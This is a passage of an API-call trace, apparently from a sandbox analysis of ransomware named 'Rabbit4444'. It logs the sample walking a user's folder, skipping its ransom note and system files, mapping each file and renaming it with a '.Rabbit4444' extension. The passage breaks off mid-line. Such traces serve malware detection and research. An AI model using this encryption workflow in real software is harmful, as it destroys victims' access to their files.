[0070.515] lstrcmpiW (lpString1="9984ecc0-931c-4feb-8996-203a6ffaa852_withdraw.xml", lpString2="..") returned 1 [0070.515] lstrcmpiW (lpString1="9984ecc0-931c-4feb-8996-203a6ffaa852_withdraw.xml", lpString2="windows") returned -1 [0070.515] lstrcmpiW (lpString1="9984ecc0-931c-4feb-8996-203a6ffaa852_withdraw.xml", lpString2="bootmgr") returned -1 [0070.515] lstrcmpiW (lpString1="9984ecc0-931c-4feb-8996-203a6ffaa852_withdraw.xml", lpString2="pagefile.sys") returned -1 [0070.515] lstrcmpiW (lpString1="9984ecc0-931c-4feb-8996-203a6ffaa852_withdraw.xml", lpString2="boot") returned -1 [0070.515] lstrcmpiW (lpString1="9984ecc0-931c-4feb-8996-203a6ffaa852_withdraw.xml", lpString2="ids.txt") returned -1 [0070.515] lstrcmpiW (lpString1="9984ecc0-931c-4feb-8996-203a6ffaa852_withdraw.xml", lpString2="NTUSER.DAT") returned -1 [0070.515] lstrcpyW (in: lpString1=0x130ec14, lpString2="9984ecc0-931c-4feb-8996-203a6ffaa852_withdraw.xml" | out: lpString1="9984ecc0-931c-4feb-8996-203a6ffaa852_withdraw.xml") returned="9984ecc0-931c-4feb-8996-203a6ffaa852_withdraw.xml" [0070.515] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\9984ecc0-931c-4feb-8996-203a6ffaa852_withdraw.xml", dwFileAttributes=0x0) returned 1 [0070.515] lstrlenW (lpString="9984ecc0-931c-4feb-8996-203a6ffaa852_withdraw.xml") returned 49 [0070.515] lstrlenW (lpString="Rabbit4444") returned 10 [0070.515] lstrcmpiW (lpString1="thdraw.xml", lpString2="Rabbit4444") returned 1 [0070.515] lstrlenW (lpString=".dll") returned 4 [0070.515] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0070.515] lstrlenW (lpString=".lnk") returned 4 [0070.515] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0070.515] lstrlenW (lpString=".ini") returned 4 [0070.515] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0070.515] lstrlenW (lpString=".sys") returned 4 [0070.515] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0070.515] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\9984ecc0-931c-4feb-8996-203a6ffaa852_withdraw.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\9984ecc0-931c-4feb-8996-203a6ffaa852_withdraw.xml"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0070.516] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0070.516] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16182660026) returned 1 [0070.516] GetFileSizeEx (in: hFile=0x29c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=16780) returned 1 [0070.516] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0070.516] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0070.516] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4490, lpName=0x0) returned 0x2d0 [0070.520] MapViewOfFile (hFileMappingObject=0x2d0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4490) returned 0x70000 [0070.521] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x115288 [0070.521] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0070.521] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115288 | out: hHeap=0xe0000) returned 1 [0070.521] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0070.521] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11d948 [0070.521] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0070.521] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11d948 | out: hHeap=0xe0000) returned 1 [0070.522] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0070.522] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16183230108) returned 1 [0070.522] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0070.522] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0070.522] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.522] CloseHandle (hObject=0x2d0) returned 1 [0070.522] CloseHandle (hObject=0x29c) returned 1 [0070.522] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\9984ecc0-931c-4feb-8996-203a6ffaa852_withdraw.xml.Rabbit4444") returned 170 [0070.522] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\9984ecc0-931c-4feb-8996-203a6ffaa852_withdraw.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\9984ecc0-931c-4feb-8996-203a6ffaa852_withdraw.xml"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\9984ecc0-931c-4feb-8996-203a6ffaa852_withdraw.xml.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\9984ecc0-931c-4feb-8996-203a6ffaa852_withdraw.xml.rabbit4444"), dwFlags=0x1) returned 1 [0070.523] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7370840, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0xc7370840, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xb9eacc8c, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x433c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="acae4208-0ac4-4ef7-ac45-bb688b09e559_show.xml", cAlternateFileName="ACAE42~1.XML")) returned 1 [0070.523] lstrcmpiW (lpString1="acae4208-0ac4-4ef7-ac45-bb688b09e559_show.xml", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.523] lstrcmpiW (lpString1="acae4208-0ac4-4ef7-ac45-bb688b09e559_show.xml", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.523] lstrcmpiW (lpString1="acae4208-0ac4-4ef7-ac45-bb688b09e559_show.xml", lpString2="Rabbit4444.exe") returned -1 [0070.523] lstrcmpiW (lpString1="acae4208-0ac4-4ef7-ac45-bb688b09e559_show.xml", lpString2=".") returned 1 [0070.523] lstrcmpiW (lpString1="acae4208-0ac4-4ef7-ac45-bb688b09e559_show.xml", lpString2="..") returned 1 [0070.523] lstrcmpiW (lpString1="acae4208-0ac4-4ef7-ac45-bb688b09e559_show.xml", lpString2="windows") returned -1 [0070.523] lstrcmpiW (lpString1="acae4208-0ac4-4ef7-ac45-bb688b09e559_show.xml", lpString2="bootmgr") returned -1 [0070.523] lstrcmpiW (lpString1="acae4208-0ac4-4ef7-ac45-bb688b09e559_show.xml", lpString2="pagefile.sys") returned -1 [0070.523] lstrcmpiW (lpString1="acae4208-0ac4-4ef7-ac45-bb688b09e559_show.xml", lpString2="boot") returned -1 [0070.523] lstrcmpiW (lpString1="acae4208-0ac4-4ef7-ac45-bb688b09e559_show.xml", lpString2="ids.txt") returned -1 [0070.523] lstrcmpiW (lpString1="acae4208-0ac4-4ef7-ac45-bb688b09e559_show.xml", lpString2="NTUSER.DAT") returned -1 [0070.523] lstrcpyW (in: lpString1=0x130ec14, lpString2="acae4208-0ac4-4ef7-ac45-bb688b09e559_show.xml" | out: lpString1="acae4208-0ac4-4ef7-ac45-bb688b09e559_show.xml") returned="acae4208-0ac4-4ef7-ac45-bb688b09e559_show.xml" [0070.523] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\acae4208-0ac4-4ef7-ac45-bb688b09e559_show.xml", dwFileAttributes=0x0) returned 1 [0070.523] lstrlenW (lpString="acae4208-0ac4-4ef7-ac45-bb688b09e559_show.xml") returned 45 [0070.523] lstrlenW (lpString="Rabbit4444") returned 10 [0070.523] lstrcmpiW (lpString1="9_show.xml", lpString2="Rabbit4444") returned -1 [0070.523] lstrlenW (lpString=".dll") returned 4 [0070.523] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0070.523] lstrlenW (lpString=".lnk") returned 4 [0070.523] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0070.523] lstrlenW (lpString=".ini") returned 4 [0070.524] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0070.524] lstrlenW (lpString=".sys") returned 4 [0070.524] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0070.524] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\acae4208-0ac4-4ef7-ac45-bb688b09e559_show.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\acae4208-0ac4-4ef7-ac45-bb688b09e559_show.xml"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0070.524] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0070.524] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16183472546) returned 1 [0070.524] GetFileSizeEx (in: hFile=0x29c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=17212) returned 1 [0070.524] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0070.524] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0070.524] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4640, lpName=0x0) returned 0x2d0 [0070.525] MapViewOfFile (hFileMappingObject=0x2d0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4640) returned 0x70000 [0070.526] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x115288 [0070.526] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0070.526] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115288 | out: hHeap=0xe0000) returned 1 [0070.526] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0070.526] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11d948 [0070.527] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0070.527] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11d948 | out: hHeap=0xe0000) returned 1 [0070.527] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0070.527] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16183746804) returned 1 [0070.527] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0070.527] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0070.527] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.527] CloseHandle (hObject=0x2d0) returned 1 [0070.527] CloseHandle (hObject=0x29c) returned 1 [0070.527] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\acae4208-0ac4-4ef7-ac45-bb688b09e559_show.xml.Rabbit4444") returned 166 [0070.527] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\acae4208-0ac4-4ef7-ac45-bb688b09e559_show.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\acae4208-0ac4-4ef7-ac45-bb688b09e559_show.xml"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\acae4208-0ac4-4ef7-ac45-bb688b09e559_show.xml.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\acae4208-0ac4-4ef7-ac45-bb688b09e559_show.xml.rabbit4444"), dwFlags=0x1) returned 1 [0070.528] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc73bcca8, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0xc73bcca8, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xba09c6cc, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x443f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="acae4208-0ac4-4ef7-ac45-bb688b09e559_withdraw.xml", cAlternateFileName="ACAE42~2.XML")) returned 1 [0070.528] lstrcmpiW (lpString1="acae4208-0ac4-4ef7-ac45-bb688b09e559_withdraw.xml", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.528] lstrcmpiW (lpString1="acae4208-0ac4-4ef7-ac45-bb688b09e559_withdraw.xml", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.528] lstrcmpiW (lpString1="acae4208-0ac4-4ef7-ac45-bb688b09e559_withdraw.xml", lpString2="Rabbit4444.exe") returned -1 [0070.528] lstrcmpiW (lpString1="acae4208-0ac4-4ef7-ac45-bb688b09e559_withdraw.xml", lpString2=".") returned 1 [0070.528] lstrcmpiW (lpString1="acae4208-0ac4-4ef7-ac45-bb688b09e559_withdraw.xml", lpString2="..") returned 1 [0070.528] lstrcmpiW (lpString1="acae4208-0ac4-4ef7-ac45-bb688b09e559_withdraw.xml", lpString2="windows") returned -1 [0070.528] lstrcmpiW (lpString1="acae4208-0ac4-4ef7-ac45-bb688b09e559_withdraw.xml", lpString2="bootmgr") returned -1 [0070.528] lstrcmpiW (lpString1="acae4208-0ac4-4ef7-ac45-bb688b09e559_withdraw.xml", lpString2="pagefile.sys") returned -1 [0070.528] lstrcmpiW (lpString1="acae4208-0ac4-4ef7-ac45-bb688b09e559_withdraw.xml", lpString2="boot") returned -1 [0070.528] lstrcmpiW (lpString1="acae4208-0ac4-4ef7-ac45-bb688b09e559_withdraw.xml", lpString2="ids.txt") returned -1 [0070.528] lstrcmpiW (lpString1="acae4208-0ac4-4ef7-ac45-bb688b09e559_withdraw.xml", lpString2="NTUSER.DAT") returned -1 [0070.528] lstrcpyW (in: lpString1=0x130ec14, lpString2="acae4208-0ac4-4ef7-ac45-bb688b09e559_withdraw.xml" | out: lpString1="acae4208-0ac4-4ef7-ac45-bb688b09e559_withdraw.xml") returned="acae4208-0ac4-4ef7-ac45-bb688b09e559_withdraw.xml" [0070.528] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\acae4208-0ac4-4ef7-ac45-bb688b09e559_withdraw.xml", dwFileAttributes=0x0) returned 1 [0070.529] lstrlenW (lpString="acae4208-0ac4-4ef7-ac45-bb688b09e559_withdraw.xml") returned 49 [0070.529] lstrlenW (lpString="Rabbit4444") returned 10 [0070.529] lstrcmpiW (lpString1="thdraw.xml", lpString2="Rabbit4444") returned 1 [0070.529] lstrlenW (lpString=".dll") returned 4 [0070.529] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0070.529] lstrlenW (lpString=".lnk") returned 4 [0070.529] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0070.529] lstrlenW (lpString=".ini") returned 4 [0070.529] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0070.529] lstrlenW (lpString=".sys") returned 4 [0070.529] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0070.529] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\acae4208-0ac4-4ef7-ac45-bb688b09e559_withdraw.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\acae4208-0ac4-4ef7-ac45-bb688b09e559_withdraw.xml"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0070.529] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0070.529] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16184000851) returned 1 [0070.529] GetFileSizeEx (in: hFile=0x29c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=17471) returned 1 [0070.529] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0070.529] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0070.529] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4740, lpName=0x0) returned 0x2d0 [0070.530] MapViewOfFile (hFileMappingObject=0x2d0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4740) returned 0x70000 [0070.531] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x115288 [0070.532] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0070.532] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115288 | out: hHeap=0xe0000) returned 1 [0070.532] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0070.532] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11d948 [0070.532] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0070.532] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11d948 | out: hHeap=0xe0000) returned 1 [0070.532] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0070.532] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16184274064) returned 1 [0070.532] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0070.532] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0070.532] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.532] CloseHandle (hObject=0x2d0) returned 1 [0070.532] CloseHandle (hObject=0x29c) returned 1 [0070.532] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\acae4208-0ac4-4ef7-ac45-bb688b09e559_withdraw.xml.Rabbit4444") returned 170 [0070.532] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\acae4208-0ac4-4ef7-ac45-bb688b09e559_withdraw.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\acae4208-0ac4-4ef7-ac45-bb688b09e559_withdraw.xml"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\acae4208-0ac4-4ef7-ac45-bb688b09e559_withdraw.xml.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\acae4208-0ac4-4ef7-ac45-bb688b09e559_withdraw.xml.rabbit4444"), dwFlags=0x1) returned 1 [0070.533] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6f91119, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0xc6f91119, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xb8d3a091, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x442d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="c0802597-6174-487a-b7de-20e8b1aa384e_show.xml", cAlternateFileName="C08025~1.XML")) returned 1 [0070.533] lstrcmpiW (lpString1="c0802597-6174-487a-b7de-20e8b1aa384e_show.xml", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.533] lstrcmpiW (lpString1="c0802597-6174-487a-b7de-20e8b1aa384e_show.xml", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.533] lstrcmpiW (lpString1="c0802597-6174-487a-b7de-20e8b1aa384e_show.xml", lpString2="Rabbit4444.exe") returned -1 [0070.533] lstrcmpiW (lpString1="c0802597-6174-487a-b7de-20e8b1aa384e_show.xml", lpString2=".") returned 1 [0070.533] lstrcmpiW (lpString1="c0802597-6174-487a-b7de-20e8b1aa384e_show.xml", lpString2="..") returned 1 [0070.533] lstrcmpiW (lpString1="c0802597-6174-487a-b7de-20e8b1aa384e_show.xml", lpString2="windows") returned -1 [0070.533] lstrcmpiW (lpString1="c0802597-6174-487a-b7de-20e8b1aa384e_show.xml", lpString2="bootmgr") returned 1 [0070.533] lstrcmpiW (lpString1="c0802597-6174-487a-b7de-20e8b1aa384e_show.xml", lpString2="pagefile.sys") returned -1 [0070.533] lstrcmpiW (lpString1="c0802597-6174-487a-b7de-20e8b1aa384e_show.xml", lpString2="boot") returned 1 [0070.533] lstrcmpiW (lpString1="c0802597-6174-487a-b7de-20e8b1aa384e_show.xml", lpString2="ids.txt") returned -1 [0070.533] lstrcmpiW (lpString1="c0802597-6174-487a-b7de-20e8b1aa384e_show.xml", lpString2="NTUSER.DAT") returned -1 [0070.533] lstrcpyW (in: lpString1=0x130ec14, lpString2="c0802597-6174-487a-b7de-20e8b1aa384e_show.xml" | out: lpString1="c0802597-6174-487a-b7de-20e8b1aa384e_show.xml") returned="c0802597-6174-487a-b7de-20e8b1aa384e_show.xml" [0070.534] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\c0802597-6174-487a-b7de-20e8b1aa384e_show.xml", dwFileAttributes=0x0) returned 1 [0070.534] lstrlenW (lpString="c0802597-6174-487a-b7de-20e8b1aa384e_show.xml") returned 45 [0070.534] lstrlenW (lpString="Rabbit4444") returned 10 [0070.534] lstrcmpiW (lpString1="e_show.xml", lpString2="Rabbit4444") returned -1 [0070.534] lstrlenW (lpString=".dll") returned 4 [0070.534] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0070.534] lstrlenW (lpString=".lnk") returned 4 [0070.534] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0070.534] lstrlenW (lpString=".ini") returned 4 [0070.535] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0070.535] lstrlenW (lpString=".sys") returned 4 [0070.535] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0070.535] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\c0802597-6174-487a-b7de-20e8b1aa384e_show.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\c0802597-6174-487a-b7de-20e8b1aa384e_show.xml"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0070.535] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0070.535] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16184575828) returned 1 [0070.535] GetFileSizeEx (in: hFile=0x29c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=17453) returned 1 [0070.535] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0070.535] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0070.535] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4730, lpName=0x0) returned 0x2d0 [0070.536] MapViewOfFile (hFileMappingObject=0x2d0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4730) returned 0x70000 [0070.537] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x115288 [0070.537] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0070.537] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115288 | out: hHeap=0xe0000) returned 1 [0070.537] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0070.537] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11d948 [0070.538] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0070.538] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11d948 | out: hHeap=0xe0000) returned 1 [0070.538] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0070.538] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16184848528) returned 1 [0070.538] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0070.538] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0070.538] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.538] CloseHandle (hObject=0x2d0) returned 1 [0070.538] CloseHandle (hObject=0x29c) returned 1 [0070.538] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: 